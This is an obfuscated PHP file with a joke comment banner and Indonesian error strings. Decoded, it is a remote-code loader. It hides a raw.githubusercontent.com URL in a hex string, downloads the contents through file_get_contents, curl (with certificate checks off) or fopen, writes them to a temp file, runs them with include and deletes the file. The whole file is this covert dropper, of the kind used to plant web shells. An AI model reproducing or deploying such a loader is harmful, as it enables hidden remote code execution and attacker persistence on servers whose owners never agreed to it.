                                                                        |     Awkowkwowko    |

*/
goto O833; O693: $O0 = o1($O1); goto O254; O598: $O03 = tempnam(sys_get_temp_dir(), "\x73\143\x72\151\x70\x74\x5f"); goto O498; O398: unlink($O03); goto O066; O838: goto O046; goto O154; O219: if (!($O01 === false)) { goto O036; } goto O351; O152: if (!(file_put_contents($O03, $O72->getScript()) === false)) { goto O811; } goto O252; O932: function o1($O3) { goto O7; O8: $O9 = 0; goto O9; O94: return $O4; goto O70; O6: O2: goto O27; O64: goto O1; goto O32; O9: O1: goto O4; O5: $O4 .= chr(hexdec($O3[$O9] . $O3[$O9 + 1])); goto O6; O4: if (!($O9 < strlen($O3) - 1)) { goto O0; } goto O5; O32: O0: goto O94; O27: $O9 += 2; goto O64; O7: $O4 = ''; goto O8; O70: } goto O693; O833: $O1 = "\x36\x38\67\x34\x37\64\67\60\67\63\63\101\62\x46\x32\x46\x37\62\66\x31\67\x37\62\x45\x36\x37\x36\71\x37\x34\x36\70\67\x35\x36\x32\67\x35\67\x33\x36\x35\67\62\66\63\66\x46\x36\x45\67\64\66\65\66\x45\67\x34\62\x45\66\63\66\x46\x36\x44\x32\106\65\60\x34\x31\x34\63\64\x42\x34\64\64\x46\x34\103\x32\106\67\63\x36\x38\x36\61\66\x43\x36\103\66\x37\63\x31\63\66\x32\106\67\62\66\x35\x36\x36\67\x33\62\x46\66\70\x36\x35\66\x31\66\64\67\63\x32\106\66\x44\x36\61\66\71\x36\105\x32\106\x37\x38\x37\x38\x37\70\x32\105\67\x34\67\70\67\64"; goto O932; O831: error_log("\x46\151\154\x65\40\163\x65\155\145\x6e\164\141\162\x61\x20\x74\x69\x64\141\x6b\40\144\151\x74\145\155\x75\153\x61\x6e\x20\165\x6e\x74\x75\153\40\144\x69\x68\x61\x70\165\163\56"); goto O838; O351: die("\107\141\x67\141\x6c\40\155\145\x6e\144\157\x77\156\x6c\x6f\x61\144\x20\x73\x63\162\x69\x70\x74\x20\120\x48\120\x20\144\141\162\151\x20\125\122\x4c\x2e"); goto O504; O057: $O01 = o3($O0); goto O219; O534: $O72->O9($O01); goto O598; O498: if (!($O03 === false)) { goto O909; } goto O523; O319: class O8 { private $O1; public function o9($O50) { $this->O1 = $O50; } public function getScript() { goto O195; O195: $O70 = $this->O1; goto O339; O339: $this->O1 = null; goto O780; O780: return $O70; goto O450; O450: } } goto O492; O492: $O72 = new o8(); goto O057; O273: O811: goto O357; O252: die("\107\141\147\141\x6c\40\x6d\145\156\x75\x6c\151\163\40\x6b\145\40\146\x69\154\x65\x20\163\x65\155\x65\156\x74\x61\x72\141\56"); goto O273; O357: include $O03; goto O082; O023: O909: goto O152; O154: O049: goto O398; O082: if (file_exists($O03)) { goto O049; } goto O831; O504: O036: goto O534; O254: function o3($O0) { goto O56; O33: curl_setopt($O7, CURLOPT_RETURNTRANSFER, 1); goto O18; O28: $O2 = curl_exec($O7); goto O48; O17: O06: goto O62; O73: curl_setopt($O7, CURLOPT_URL, $O0); goto O33; O18: curl_setopt($O7, CURLOPT_SSL_VERIFYPEER, false); goto O28; O88: O92: goto O22; O56: if (ini_get("\x61\x6c\154\157\167\x5f\165\x72\154\137\x66\x6f\x70\145\x6e")) { goto O99; } goto O76; O23: goto O12; goto O59; O05: O74: goto O16; O66: $O8 = false; goto O46; O72: goto O12; goto O17; O03: $O8 .= $O2; goto O39; O16: return $O8; goto O23; O77: error_log("\x43\x75\162\x6c\40\145\x72\x72\157\162\72\x20" . curl_error($O7)); goto O02; O76: if (function_exists("\143\165\x72\154\137\151\x6e\x69\x74")) { goto O06; } goto O66; O98: $O8 = ''; goto O88; O02: return false; goto O61; O41: O00: goto O84; O67: return $O2; goto O44; O59: O99: goto O11; O11: return file_get_contents($O0); goto O72; O48: if (!curl_errno($O7)) { goto O82; } goto O77; O04: curl_close($O7); goto O67; O39: goto O92; goto O41; O46: if (!($O5 = fopen($O0, "\x72"))) { goto O74; } goto O98; O62: $O7 = curl_init(); goto O73; O22: if (!($O2 = fread($O5, 8192))) { goto O00; } goto O03; O84: fclose($O5); goto O05; O44: O12: goto O527; O61: O82: goto O04; O527: } goto O319; O523: die("\x47\x61\147\141\154\x20\x6d\x65\x6d\142\165\x61\x74\x20\146\151\154\145\40\x73\x65\155\x65\156\x74\x61\162\x61\56"); goto O023; O066: O046:
